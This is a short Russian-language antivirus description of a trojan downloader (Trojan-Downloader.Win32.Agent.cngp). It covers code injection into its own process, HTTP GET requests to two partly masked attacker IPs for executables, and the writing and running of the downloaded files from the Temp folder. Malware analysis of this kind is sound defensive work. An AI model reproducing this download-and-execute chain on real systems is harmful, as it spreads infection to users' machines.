Описание |
После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как «Trojan-Downloader.Win32.Agent.cngp»). Внедренный код выполняет следующие действия:
- устанавливает соединение с хостами:
188.***.161
85.***.111
- В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:
GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
Host: 188.***.161
GET /bat.exe HTTP/1.0
Host: 188.***.161
GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
Host: 85.***.111
GET /bat.exe HTTP/1.0
Host: 85.***.111
- В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:
%WinDir%Temp_ex-.exe
где – случайные двухзначные десятичные числа.
На момент создания описания файлы не загружались.
- Запускает на выполнение загруженные файлы.
|